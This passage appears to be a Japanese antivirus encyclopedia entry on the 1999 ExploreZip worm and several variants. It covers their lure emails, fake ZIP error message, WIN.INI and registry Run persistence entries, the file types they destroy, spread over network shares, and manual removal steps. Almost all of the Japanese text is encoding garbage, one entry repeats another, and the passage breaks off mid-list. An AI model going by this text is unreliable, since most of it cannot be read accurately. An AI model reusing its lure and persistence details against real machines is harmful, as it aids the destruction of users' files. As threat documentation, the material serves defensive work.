¤³¤Î¥ì¥¸¥¹¥È¥ê¤ÎÊѹ¹¤Ï¡¢RegEdit.exe¤Ê¤É¤Ç³Îǧ¤Ç¤­¤ë¡£ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run¤Ë¡¢¡ÈC:\WINDOWS\Expl32.exe¡É¤È¤¤¤¦
ÃͤΥµ¥Ö¥­¡¼¡ÉExplorer32¡É¤¬ºîÀ®¤µ¤ì¤Æ¤¤¤ë¡£ Expl32.exe¤Ï¡¢À©¸Â¤ò¼õ¤±¤º¤Ë¡¢WSOCK32.DLL¤ò¸Æ¤Ó½Ð¤·¡¢ ¥Í¥Ã¥È¥ï¡¼¥¯·Ðͳ¤Ç¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤Ë¥¢¥¯¥»¥¹¤Ç ¤­¤ë¡£¤Þ¤¿¡¢WINMM.DLL¤ò»²¾È¤·¤Æ¡¢¥¯¥é¥¤¥¢¥ó¥È¦¤«¤é´¶ À÷¥³¥ó¥Ô¥å¡¼¥¿¤Î¥Þ¥ë¥Á¥á¥Ç¥£¥¢¡¦¥¢¥×¥ê¥±¡¼¥·¥ç¥ó¤òÁà ºî¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£ ´¶À÷¤·¤¿¥Þ¥·¥ó¤¬¥Í¥Ã¥È¥ï¡¼¥¯Àܳ¤ËMS¥×¥í¥­¥·¤òÍøÍѤ· ¤Æ¤¤¤ë¤È¡¢¥µ¡¼¥ÐŽ¥¥â¥¸¥å¡¼¥ë¤Ï¥Í¥Ã¥È¥ï¡¼¥¯¤ÎÀܳ¹¹¿·¥ì ¡¼¥È¤ÎÃͤò£²¤«¤é850¤ËÊѹ¹¤¹¤ë¡£ ¥µ¡¼¥ÐŽ¥¥â¥¸¥å¡¼¥ë¤Ï¥¯¥é¥¤¥¢¥ó¥È¤ÎIP¥¢¥É¥ì¥¹¤ò¥À¥¦¥ó¥í ¡¼¥É¤·¡¢¤½¤ÎIP¥¢¥É¥ì¥¹¤¬¥¢¥¯¥Æ¥£¥Ö¤Ê¤È¤­¡¢¤½¤ì¤òÊѹ¹ ¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£

TROJ_EXPLOREZIP


̾¡¡¡¡¾Î:TROJ_EXPLOREZIP

ÊÌ¡¡¡¡Ì¾:WORM.EXPLOREZIP

ʬ¡¡¡¡Îà:¥ï¡¼¥à

ȯ¾ÍÃÏ:¥¤¥¹¥é¥¨¥ë

ȯ¸«Æü:1999/06

¾Ü¡¡¡¡ºÙ:TROJ_EXPLOREZIP¤Ï¡¤°­¼Á¤ÊÇ˲õ³èư¤ò¹Ô¤¦¥ï
¡¼¥à¤Ç¤¹¡£¥¤¥¹¥é¥¨¥ë¤Çȯ¸«¤µ¤ìޤUSA¤Ç´ë¶È¤Ê¤É¤¬Â絬ÌÏ ´¶À÷¤·¤Æ¤¤¤ë¤È¤ÎÊó¹ð¤¬¤¢¤êޤÆüËܹñÆâ¤Ç¤Îȯ¸«¤ÎÊó¹ð¤â¸½ ºß¤Þ¤Ç¤Ë¿ô·ï¤¢¤¬¤Ã¤Æ¤¤¤Þ¤¹Ž¡ ¤³¤Î¥×¥í¥°¥é¥à¤ÏWINDOWS95/98/NT¾å¤Çưºî¤·¤Þ¤¹Ž¡¼Â¹Ô¤¹ ¤ë¤ÈޤMAPI¤òÍøÍѤ·¤ÆŽ¤Microsoft Outlook ¤Î¤è¤¦¤ÊE-Mail ¥×¥í¥°¥é¥à¤òÁàºî¤·Ž¤¼õ¿®¤·¤¿¥á¡¼¥ë¤¹¤Ù¤Æ¤Ë¼«Æ°Åª¤Ë¤³¤Î ¥ï¡¼¥à¤òźÉÕ¤·¤¿¥á¡¼¥ë¤òÊÖ¿®¤·¤Þ¤¹Ž¡ ¡Ú¥á¡¼¥ë¤ÎËÜʸ¡Û Hi ! I received your email and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs. (ʸ¤ÎºÇ¸å¤Ë¡ÈBye¡Éޤ ¡ÈSincerely"ޤ All ¡Éޤ ¤Ê¤É¤Î°§»¢¤¬¤Ä¤¤¤Æ¤¤¤Þ¤¹Ž¡) ¤³¤Î¤È¤­ÅºÉÕ¤µ¤ì¤ë¥Õ¥¡¥¤¥ë¤Î̾¾Î¤Ï"zipped_files.exe" ¤Ç¤¹Ž¡¥á¡¼¥ë¤ò¼õ¤±¼è¤Ã¤¿¿Í¤¬Ž¤ÅºÉÕ¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤Èޤ °Ê²¼¤Î¤è¤¦¤Êµ¶¤Î¥¨¥é¡¼¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤·¤Þ¤¹Ž¡
"Cannot open file: it does not appear to be a valid
archive. If this file is part of a ZIP format backup set, insert the last disk of the backup set and try again. Please press F1 for help."
¤³¤Î´Ö¤ËޤWindows95/98¤Î´Ä¶­¤Ç¤Ïޤc:\windows\system ¥Ç
¥£¥ì¥¯¥È¥ê¤ÎÃæ¤Ëޤ"Explore.exe"¤È¤¤¤¦¼«Ê¬¼«¿È¤Î¥³¥Ô ¡¼¤òºîÀ®¤·Ž¤WIN.INI¥Õ¥¡¥¤¥ë¤Ë°Ê²¼¤Î¹Ô¤òÉÕ¤±Â­¤·¤Þ¤¹Ž¡ Windows
"run=C:\WINDOWS\SYSTEM\Explore.exe"

WindowsNT¤Î´Ä¶­¤Ç¤Ïޤ"C:\WINNT\SYSTEM32"¥Ç¥£¥ì¥¯¥È¥ê¤Î
Ãæ¤Ë"Explore.exe"¤È¤¤¤¦¼«Ê¬¼«¿È¤Î¥³¥Ô¡¼¤òºîÀ®¤·Ž¤°Ê²¼
¤Î¥ì¥¸¥¹¥È¥ê¤Î¥­¡¼"run"¤Ë"c:\winnt\system32\Explore.
exe"¤È¤¤¤¦ÃͤòÉÕ¤±²Ã¤¨¤Þ¤¹Ž¡ HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\ CurrentVersion\Windows ¤³¤ì¤Ë¤è¤Ã¤ÆŽ¤¥Þ¥·¥ó¤Îµ¯Æ°»þ¤Ëɬ¤ºŽ¤¤³¤Î¥ï¡¼¥à¥×¥í¥°¥é ¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹Ž¡ ¡ÚÇ˲õ³èư¡Û 1. ¤³¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤Èޤ¾ï¤Ëޤ¤¹¤Ù¤Æ¤Î¥Ï¡¼¥É¥Ç ¥£¥¹¥¯¥É¥é¥¤¥Ö¤ò¸¡º÷¤·¤ÆŽ¤°Ê²¼¤Î³ÈÄ¥»Ò¤Î¥Õ¥¡¥¤¥ë¤òõ¤· ޤ¤½¤Î¥Õ¥¡¥¤¥ë¤Î¥µ¥¤¥º¤ò0¥Ð¥¤¥È¤Ë¤·¤ÆÇ˲õ¡¤Éüµì¤Ç¤­¤Ê ¤¯¤·¤Æ¤·¤Þ¤¤¤Þ¤¹Ž¡¤¿¤À¤·Ž¤¤³¤ì¤é¤Î¥Õ¥¡¥¤¥ë¤Î°À­¤¬Ž¢ÆÉ¤ß ¼è¤êÀìÍÑŽ£¤Þ¤¿¤ÏŽ¢±£¤·¥Õ¥¡¥¤¥ëŽ£¤Ë¤Ê¤Ã¤Æ¤¤¤¿¤È¤­¤ÏÇ˲õ¤µ ¤ì¤Þ¤»¤óŽ¡ .c (c source code files) .cpp (c++ source code files) .h (program header files) .asm (assembly source code) .doc (Microsoft Word) .xls (Microsoft Excel) .ppt (Microsoft PowerPoint) ¥á¥â¥ê¤Ë¾ïÃ󤹤ë¤Î¤Ç¤Ï¤Ê¤¯Ž¤¾ï¤Ëޤ¥Ï¡¼¥É¥Ç¥£¥¹¥¯Æâ¤ò¸¡ º÷¤¹¤ëÊý¼°¤òºÎ¤Ã¤Æ¤¤¤Þ¤¹Ž¡¤³¤Î¤¿¤áޤ¥Þ¥·¥ó¤Î¥Ñ¥Õ¥©¡¼¥Þ ¥ó¥¹¤¬Äã²¼¤·¤Þ¤¹Ž¡ 2. ¤³¤Î¥ï¡¼¥à¤Ï¥á¡¼¥ë¤ò²ð¤·¤Æ¼«¸ÊÈË¿£¤¹¤ë¤À¤±¤Ç¤Ï¤¢¤ê ¤Þ¤»¤ó¡£¤¤¤Ã¤¿¤ó¥Þ¥·¥ó¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ìޤ³èư¤ò³«»Ï¤¹ ¤ë¤Èޤ¥Í¥Ã¥È¥ï¡¼¥¯¤Ç¤Ä¤Ê¤¬¤Ã¤Æ¤¤¤ë¥Þ¥·¥ó¤Î¶¦Í­¥Ç¥£¥ì¥¯ ¥È¥ê¤Ë¤¹¤Ù¤Æ¥¢¥¯¥»¥¹¤·Ž¤¹¶·âÂоݤΥե¡¥¤¥ë¤òõ¤·¤Þ¤¹Ž¡ ¤³¤Î¶¦Í­¥Ç¥£¥ì¥¯¥È¥ê¤Î¥¢¥¯¥»¥¹¸¢¤¬Ä㤯ÀßÄꤵ¤ì¤Æ¤¤¤¿ ¾ì¹ç(¤Ä¤Þ¤ê½ñ¤­¹þ¤ß²Äǽ¤Ç¤¢¤Ã¤¿¾ì¹ç)ޤ¤³¤Î¥¦¥¤¥ë¥¹¤Î¹¶ ·â¤¬²Äǽ¤Ë¤Ê¤êޤ¸«¤Ä¤«¤Ã¤¿¥Õ¥¡¥¤¥ë¤¹¤Ù¤Æ¤ËÂФ·¤Æ¹¶·â¤ò ¹Ô¤¤¤Þ¤¹Ž¡¥µ¥¤¥º¤ò0KB¤Ë¤·¤ÆÇ˲õޤÉüµì¤òÉÔ²Äǽ¤Ë¤·¤Æ¤·¤Þ ¤¦¤Î¤Ç¤¹Ž¡¤Þ¤¿Ž¤¤³¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤Æ¤¤¤ë´Ö¤Ë¤½¤Î ¥Þ¥·¥ó¤ÇºîÀ®¤·¤¿¥Õ¥¡¥¤¥ë¤â¤¹¤Ù¤ÆÇ˲õ¤µ¤ì¤Þ¤¹Ž¡ 3. Ã×̿Ū¤Ê¤³¤È¤Ëޤ¤³¤Î¥ï¡¼¥à¤Ïޤ¥Í¥Ã¥È¥ï¡¼¥¯¾å¤Î¤Û¤«¤Î ¥Þ¥·¥ó¤Ë¥ê¥â¡¼¥È¥¤¥ó¥¹¥È¡¼¥ë¤ò¹Ô¤¦µ¡Ç½¤òÍ­¤·¤Æ¤¤¤Þ¤¹Ž¡ ¤³¤Î¥ë¡¼¥Á¥ó¤Ïޤ¥Í¥Ã¥È¥ï¡¼¥¯¥É¥é¥¤¥Ö¤ÎÃæ¤ÇWIN.INI¤¬¤¢ ¤ë¥Ç¥£¥ì¥¯¥È¥ê¤¬¶¦Í­¤µ¤ì¤Æ¤¤¤ë¾ì½ê¤òõ¤¹(Ä̾ï¤Ïޤ WindowsOS¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤¿¥Ç¥£¥ì¥¯¥È¥ê¤Ë¤¢¤ë)Ž¡¤³¤Î ¥Ç¥£¥ì¥¯¥È¥ê¤Ëޤ½ñ¤­¹þ¤ß¤Î¥¢¥¯¥»¥¹¸¢¤¬¤¢¤ì¤Ðޤ¤³¤³¤Ëޤ¡É _setup.exe¡É¤È¤¤¤¦Ì¾¾Î¤Ç¥Õ¥¡¥¤¥ë¤òºîÀ®¤·Ž¤WIN.INI¤Ë°Ê ²¼¤Î¹Ô¤ò²Ã¤¨Ž¤¼¡²óµ¯Æ°»þ¤Ë¤³¤Î¥ï¡¼¥à¤Î¥¤¥ó¥¹¥È¡¼¥ë¤¬¹Ô ¤ï¤ì¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹Ž¡ _Ž¢WINDOWSŽ£ run=¡É_setup.exe¡É 4. WindowsNT´Ä¶­¤Î¾ì¹ç¤Ïޤ¹¹¤Ë°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¤Î¥­¡¼" run"¤Ë"_setup.exe"¤È¤¤¤¦ÃͤòÉÕ¤±²Ã¤¨Ž¤ºÆµ¯Æ°»þ¤Î¥¤¥ó¥¹ ¥È¡¼¥ë¤òÀßÄꤷ¤Þ¤¹Ž¡ HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\ CurrentVersion\Windows ¤³¤Î¤è¤¦¤Ë¤·¤Æ¥ê¥â¡¼¥È¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤¿¾ì¹ç¤Ïޤ¥×¥í¥° ¥é¥à¤òñÂΤǼ¹Ԥ·¤¿¾ì¹ç¤È¤Ï°Û¤Ê¤êޤ¼¡²óµ¯Æ°»þ¤Ë¡É_ setup.exe¡É¤¬¼Â¹Ô¤µ¤ì¤ë¤³¤È¤Ë¤Ê¤ê¤Þ¤¹Ž¡¤³¤Î¤¿¤áޤµ¯Æ°»þ ¤Ë°Ê²¼¤Îµ¶¥¨¥é¡¼¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤Þ¤¹Ž¡
"Cannot open file: it does not appear to be a valid
archive. If this file is part of a ZIP format backup set, insert the last disk of the backup set and try again. Please press F1 for help." *WindowsNT¤Î¾ì¹ç¤Ï°Ê¸åµ¯Æ°»þ¤ËËè²ó¾å¤Î¥á¥Ã¥»¡¼¥¸¤¬É½ ¼¨¤µ¤ì¤Þ¤¹Ž¡¤·¤«¤·Ž¤ 95/98¤Î¾ì¹ç¤ÏޤºÆµ¯Æ°¸å¤ËWIN.INI¤Î µ­½Ò¤ò¡Érun=¡Éexplore.exe¡É¤È½ñ´¹¤¨Ž¤Explore.exe¤¬¼Â¹Ô ¤µ¤ì¤ë¤è¤¦ÀßÄꤷľ¤¹¤¿¤áޤ¼¡²ó¤«¤é¤Ïɽ¼¨¤µ¤ì¤Ê¤¯¤Ê¤ê¤Þ ¤¹Ž¡
È÷¡¡¡¡¹Í:¼êưºï½ü¼ê½ç
¢£Windows95/98 1.¡¡ WIN.INI¥Õ¥¡¥¤¥ë¤Îޤ°Ê²¼¤Îµ­½Ò¤òºï½ü¤·¤Þ¤¹Ž¡
"run=C:\WINDOWS\SYSTEM\Explore.exe"¡¡¤Þ¤¿¤Ï¡¢¡Érun =
_setup.exe¡É 2. ¥Þ¥·¥ó¤òºÆµ¯Æ°¤·¤Þ¤¹Ž¡
3. "C:\WINDOWS\SYSTEM\"¥Ç¥£¥ì¥¯¥È¥ê¤ÎÃæ¤Î"EXPLORE.EXE
"¡¡¤È¡¢WIN.INI ¥Õ¥¡¥¤¥ë¤ÈƱ¤¸¤È¤³¤í¤Ë¤¢¤ë¡È_setup.exe ¡É¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Þ¤¹Ž¡ ¢£Windows NT
£±¡¥ °Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¤Î"run"¤ÎÃÍ"c:\winnt\system32\
Explore.exe" ¡Ê¤Þ¤¿¤Ï¡È_setup.exe¡É¡Ë¤òºï½ü¤·¤ÆÃͤò¶õ ¤Ë¤·¤Þ¤¹Ž¡ HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\ CurrentVersion\Windows £²¡¥¥Þ¥·¥ó¤òºÆµ¯Æ°¤·¤Þ¤¹Ž¡
£³¡¥"C:\WINNT\SYSTEM32\"¥Ç¥£¥ì¥¯¥È¥ê¤Î"EXPLORE.EXE"¤Þ
¤¿¤ÏWIN.INI ¥Õ¥¡¥¤¥ë¤ÈƱ¤¸¾ì½ê¤Ë¤¢¤ë¡È_setup.exe¡É¤¤ ¤¦¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Þ¤¹Ž¡ ¥È¥ì¥ó¥É¥Þ¥¤¥¯¥í¤Î¥Û¡¼¥à¥Ú¡¼¥¸¾å¤ÇÂкö¥×¥í¥°¥é¥à¤òÍÑ °Õ¤·¤Æ¤ª¤ê¤Þ¤¹¡£
http://www.trendmicro.co.jp

TROJ_EXPLORZIP.C


̾¡¡¡¡¾Î:TROJ_EXPLORZIP.C

¸À¡¡¡¡¸ì:¥¹¥Ú¥¤¥ó¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:WIN 32bit

¥¦¥¤¥ë¥¹¥µ¥¤¥º:104,448 bytes¾Ü¡¡¡¡ºÙ:TROJ_EXPLOZIP.
C¤ÏTROJ_EXPLOREZIP¤Î°¡¼ï¤Ç¤¹¡£ºîÀ®¤µ¤ì¤ë¥Õ¥¡¥¤¥ë̾¤¬ Êѹ¹¤µ¤ì¤Æ¤ª¤ê¡¢¡Èsystem!.exe¡É¤È¤Ê¤ê¤Þ¤¹¡£ ¤Þ¤¿¡¢¥ª¥ê¥¸¥Ê¥ë¤ÈƱÍÍ¡¢*.h, *.c, *.doc, *.rtf, *.xls ¤È¤¤¤¦³ÈÄ¥»Ò¤Î¥Õ¥¡¥¤¥ë¤ò0¥Ð¥¤¥È¤Ë¤·¤Æ¤·¤Þ¤¦¤È¤¤¤¦ÇË ²õ³èư¤ò¹Ô¤¤¤Þ¤¹¡£¤Þ¤¿¡¢¥á¡¼¥ë¤Ç¤Î³È»¶µ¡Ç½¤â»ý¤Ã¤Æ¤¤ ¤Þ¤¹¡£

TROJ_EXPLOZIP.IT


̾¡¡¡¡¾Î:TROJ_EXPLOZIP.IT

ÊÌ¡¡¡¡Ì¾:Worm.ExploreZip.Neolite.IT, Worm.
ExploreZip.Neolite.IT
ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ȯ¸«Æü:1999/12/10

¾Ü¡¡¡¡ºÙ:TROJ_EXPLOZIP.IT¤ÏTROJ_EXPLOREZIP¤ÎÊѼï¤Ç
¤¹¡£TTROJ_EXPZIPWMPAK¤ÈƱÍÍ¡¢TROJ_EXPLOREZIP¤ò°µ½Ì¤· ¤¿¤â¤Î¤Ç¤¹¤¬¡¢¥á¥Ã¥»¡¼¥¸¤ä¥Õ¥¡¥¤¥ë̾¤¬¥¤¥¿¥ê¥¢¸ì¤Î¤â ¤Î¤ËÊѹ¹¤µ¤ì¤Æ¤¤¤Þ¤¹¡£ »ÈÍѤµ¤ì¤ë¥Õ¥¡¥¤¥ë̾¤Ï¤½¤ì¤¾¤ì°Ê²¼¤Î¤è¤¦¤ËÊѹ¹¤µ¤ì¤Æ ¤¤¤Þ¤¹¡£ TROJ_EXPLOREZIP TROJ_EXPLOZIP.IT --------------------------------------- Zipped_Files.exe File_Zipputi.exe _setup.exe _saver.scr Explore.exe drvssrv.exe ¡üÁ÷¿®¤µ¤ì¤ë¥á¡¼¥ë¤ÎÆâÍÆ
ËÜʸ The email that is sent out has the following body message:ho ricevuto la tua E-mail e rispondero¡Ç al piu¡Ç presto.. Nel frattempo, leggi i doc allegati.
Ciao ! źÉÕ¥Õ¥¡¥¤¥ë File_Zipputi.exe ¥¦¥¤¥ë¥¹¤Îưºî¤Ï¡¢TROJ_EXPLOREZIP¤ä¡¢TROJ_ EXPZIPWMPACK¤ÈÁ´¤¯Æ±¤¸¤Ç¤¹¡£¥á¡¼¥ëÁ÷¿®¤ä¥Í¥Ã¥È¥ï¡¼¥¯ ¾å¤Ç¤Î¥ê¥â¡¼¥È¥¤¥ó¥¹¥È¡¼¥ë¤Ê¤É³È»¶Ç½ÎϤ¬¹â¤¤¾å¡¢¥Í¥Ã ¥È¥ï¡¼¥¯¤ò¸¡º÷¤·¤ÆOffice ʸ½ñ¤ä¥×¥í¥°¥é¥à¥½¡¼¥¹¥Õ¥¡¥¤ ¥ë¤òÇ˲õ¤·¤Æ¤·¤Þ¤¦Èó¾ï¤Ë¶²¤í¤·¤¤¥¦¥¤¥ë¥¹¤Ç¤¹¡£

TROJ_EXPZIPWMPAK


̾¡¡¡¡¾Î:TROJ_EXPZIPWMPAK

ÊÌ¡¡¡¡Ì¾:WORM.PAK.EXPLOREZIP

ʬ¡¡¡¡Îà:¥ï¡¼¥à

ÂС¡¡¡¾Ý:Win95/98/NT

ȯ¾ÍÃÏ:¥¤¥¹¥é¥¨¥ëȯ¸«Æü:1999/11

¾Ü¡¡¡¡ºÙ:TROJ_EXPZIPWMPAK¤ÏTROJ_EXPLOREZIP¤ÎÊѼï¤Ç
¤¹¡£TROJ_EXPLOREZIP¤ÈƱÍÍ¡¢°­¼Á¤ÊÇ˲õ³èư¤ò¹Ô¤¦¥ï¡¼¥à ¤Ç¤¹¡£¥¤¥¹¥é¥¨¥ë¤Çȯ¸«¤µ¤ìޤUSA¤Ç´ë¶È¤Ê¤É¤¬Â絬ÌÏ´¶À÷ ¤·¤Æ¤¤¤ë¤È¤ÎÊó¹ð¤¬¤¢¤ê¤Þ¤¹¡£ ¤³¤Î¥×¥í¥°¥é¥à¤ÏWINDOWS95/98/NT¾å¤Çưºî¤·¤Þ¤¹Ž¡¼Â¹Ô¤¹ ¤ë¤ÈޤMAPI¤òÍøÍѤ·¤ÆŽ¤Microsoft Outlook ¤Î¤è¤¦¤ÊE-Mail ¥×¥í¥°¥é¥à¤òÁàºî¤·Ž¤¼õ¿®¤·¤¿¥á¡¼¥ë¤¹¤Ù¤Æ¤Ë¼«Æ°Åª¤Ë¤³¤Î ¥ï¡¼¥à¤òźÉÕ¤·¤¿¥á¡¼¥ë¤òÊÖ¿®¤·¤Þ¤¹Ž¡ ¡Ú¥á¡¼¥ë¤ÎËÜʸ¡ÛHi !I received your email and I shall send you a reply ASAP.Till then, take a look at the attached zipped docs. (ʸ¤ÎºÇ¸å¤Ë¡ÈBye¡Éޤ ¡ÈSincerely"ޤ All¡Éޤ ¤Ê¤É¤Î°§»¢¤¬ ¤Ä¤¤¤Æ¤¤¤Þ¤¹Ž¡) ¤³¤Î¤È¤­ÅºÉÕ¤µ¤ì¤ë¥Õ¥¡¥¤¥ë¤Î̾¾Î¤Ï"zipped_files.exe" ¤Ç¤¹Ž¡¥á¡¼¥ë¤ò¼õ¤±¼è¤Ã¤¿¿Í¤¬Ž¤ÅºÉÕ¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤Èޤ °Ê²¼¤Î¤è¤¦¤Êµ¶¤Î¥¨¥é¡¼¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤·¤Þ¤¹Ž¡
"Cannot open file: it does not appear to be a valid
archive. If this file is part of a ZIP format backup set, insert the last disk of the backup set and try again. Please press F1 for help."
¤³¤Î´Ö¤ËޤWindows95/98¤Î´Ä¶­¤Ç¤Ïޤc:\windows\system ¥Ç
¥£¥ì¥¯¥È¥ê¤ÎÃæ¤Ëޤ"Explore.exe"¤È¤¤¤¦¼«Ê¬¼«¿È¤Î¥³¥Ô ¡¼¤òºîÀ®¤·Ž¤WIN.INI¥Õ¥¡¥¤¥ë¤Ë°Ê²¼¤Î¹Ô¤òÉÕ¤±Â­¤·¤Þ¤¹Ž¡ _Ž¢WINDOWSŽ£
"run=C:\WINDOWS\SYSTEM\Explore.exe"

WindowsNT¤Î´Ä¶­¤Ç¤Ïޤ"C:\WINNT\SYSTEM32"¥Ç¥£¥ì¥¯¥È¥ê¤Î
Ãæ¤Ë"Explore.exe"¤È¤¤¤¦¼«Ê¬¼«¿È¤Î¥³¥Ô¡¼¤òºîÀ®¤·Ž¤°Ê²¼
¤Î¥ì¥¸¥¹¥È¥ê¤Î¥­¡¼"run"¤Ë"c:\winnt\system32\Explore.
exe"¤È¤¤¤¦ÃͤòÉÕ¤±²Ã¤¨¤Þ¤¹Ž¡ HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\ CurrentVersion\Windows ¤³¤ì¤Ë¤è¤Ã¤ÆŽ¤¥Þ¥·¥ó¤Îµ¯Æ°»þ¤Ëɬ¤ºŽ¤¤³¤Î¥ï¡¼¥à¥×¥í¥°¥é ¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹Ž¡ ¡ÚÇ˲õ³èư¡Û1. ¤³¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤Èޤ¾ï¤Ëޤ¤¹¤Ù ¤Æ¤Î¥Ï¡¼¥É¥Ç¥£¥¹¥¯¥É¥é¥¤¥Ö¤ò¸¡º÷¤·¤ÆŽ¤°Ê²¼¤Î³ÈÄ¥»Ò¤Î¥Õ ¥¡¥¤¥ë¤òõ¤·Ž¤¤½¤Î¥Õ¥¡¥¤¥ë¤Î¥µ¥¤¥º¤ò0¥Ð¥¤¥È¤Ë¤·¤ÆÇ˲õ ¡¤Éüµì¤Ç¤­¤Ê¤¯¤·¤Æ¤·¤Þ¤¤¤Þ¤¹Ž¡¤¿¤À¤·Ž¤¤³¤ì¤é¤Î¥Õ¥¡¥¤¥ë ¤Î°À­¤¬Ž¢ÆÉ¤ß¼è¤êÀìÍÑŽ£¤Þ¤¿¤ÏŽ¢±£¤·¥Õ¥¡¥¤¥ëŽ£¤Ë¤Ê¤Ã¤Æ¤¤ ¤¿¤È¤­¤ÏÇ˲õ¤µ¤ì¤Þ¤»¤óŽ¡ .c (c source code files).cpp (c++ source code files). h (program header files).asm (assembly source code). doc (Microsoft Word).xls (Microsoft Excel).ppt ( Microsoft PowerPoint) ¥á¥â¥ê¤Ë¾ïÃ󤹤ë¤Î¤Ç¤Ï¤Ê¤¯Ž¤¾ï¤Ëޤ¥Ï¡¼¥É¥Ç¥£¥¹¥¯Æâ¤ò¸¡ º÷¤¹¤ëÊý¼°¤òºÎ¤Ã¤Æ¤¤¤Þ¤¹Ž¡¤³¤Î¤¿¤áޤ¥Þ¥·¥ó¤Î¥Ñ¥Õ¥©¡¼¥Þ ¥ó¥¹¤¬Äã²¼¤·¤Þ¤¹Ž¡ 2. ¤³¤Î¥ï¡¼¥à¤Ï¥á¡¼¥ë¤ò²ð¤·¤Æ¼«¸ÊÈË¿£¤¹¤ë¤À¤±¤Ç¤Ï¤¢¤ê ¤Þ¤»¤ó¡£¤¤¤Ã¤¿¤ó¥Þ¥·¥ó¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ìޤ³èư¤ò³«»Ï¤¹ ¤ë¤Èޤ¥Í¥Ã¥È¥ï¡¼¥¯¤Ç¤Ä¤Ê¤¬¤Ã¤Æ¤¤¤ë¥Þ¥·¥ó¤Î¶¦Í­¥Ç¥£¥ì¥¯ ¥È¥ê¤Ë¤¹¤Ù¤Æ¥¢¥¯¥»¥¹¤·Ž¤¹¶·âÂоݤΥե¡¥¤¥ë¤òõ¤·¤Þ¤¹Ž¡ ¤³¤Î¶¦Í­¥Ç¥£¥ì¥¯¥È¥ê¤Î¥¢¥¯¥»¥¹¸¢¤¬Ä㤯ÀßÄꤵ¤ì¤Æ¤¤¤¿ ¾ì¹ç(¤Ä¤Þ¤ê½ñ¤­¹þ¤ß²Äǽ¤Ç¤¢¤Ã¤¿¾ì¹ç)ޤ¤³¤Î¥¦¥¤¥ë¥¹¤Î¹¶ ·â¤¬²Äǽ¤Ë¤Ê¤êޤ¸«¤Ä¤«¤Ã¤¿¥Õ¥¡¥¤¥ë¤¹¤Ù¤Æ¤ËÂФ·¤Æ¹¶·â¤ò ¹Ô¤¤¤Þ¤¹Ž¡¥µ¥¤¥º¤ò0KB¤Ë¤·¤ÆÇ˲õޤÉüµì¤òÉÔ²Äǽ¤Ë¤·¤Æ¤·¤Þ ¤¦¤Î¤Ç¤¹Ž¡¤Þ¤¿Ž¤¤³¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤Æ¤¤¤ë´Ö¤Ë¤½¤Î ¥Þ¥·¥ó¤ÇºîÀ®¤·¤¿¥Õ¥¡¥¤¥ë¤â¤¹¤Ù¤ÆÇ˲õ¤µ¤ì¤Þ¤¹Ž¡ 3. Ã×̿Ū¤Ê¤³¤È¤Ëޤ¤³¤Î¥ï¡¼¥à¤Ïޤ¥Í¥Ã¥È¥ï¡¼¥¯¾å¤Î¤Û¤«¤Î ¥Þ¥·¥ó¤Ë¥ê¥â¡¼¥È¥¤¥ó¥¹¥È¡¼¥ë¤ò¹Ô¤¦µ¡Ç½¤òÍ­¤·¤Æ¤¤¤Þ¤¹Ž¡ ¤³¤Î¥ë¡¼¥Á¥ó¤Ïޤ¥Í¥Ã¥È¥ï¡¼¥¯¥É¥é¥¤¥Ö¤ÎÃæ¤ÇWIN.INI¤¬¤¢ ¤ë¥Ç¥£¥ì¥¯¥È¥ê¤¬¶¦Í­¤µ¤ì¤Æ¤¤¤ë¾ì½ê¤òõ¤¹(Ä̾ï¤Ïޤ WindowsOS¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤¿¥Ç¥£¥ì¥¯¥È¥ê¤Ë¤¢¤ë)Ž¡¤³¤Î ¥Ç¥£¥ì¥¯¥È¥ê¤Ëޤ½ñ¤­¹þ¤ß¤Î¥¢¥¯¥»¥¹¸¢¤¬¤¢¤ì¤Ðޤ¤³¤³¤Ëޤ¡É _setup.exe¡É¤È¤¤¤¦Ì¾¾Î¤Ç¥Õ¥¡¥¤¥ë¤òºîÀ®¤·Ž¤WIN.INI¤Ë°Ê ²¼¤Î¹Ô¤ò²Ã¤¨Ž¤¼¡²óµ¯Æ°»þ¤Ë¤³¤Î¥ï¡¼¥à¤Î¥¤¥ó¥¹¥È¡¼¥ë¤¬¹Ô ¤ï¤ì¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹Ž¡ Ž¢WINDOWSŽ£run=¡É_setup.exe¡É 4. 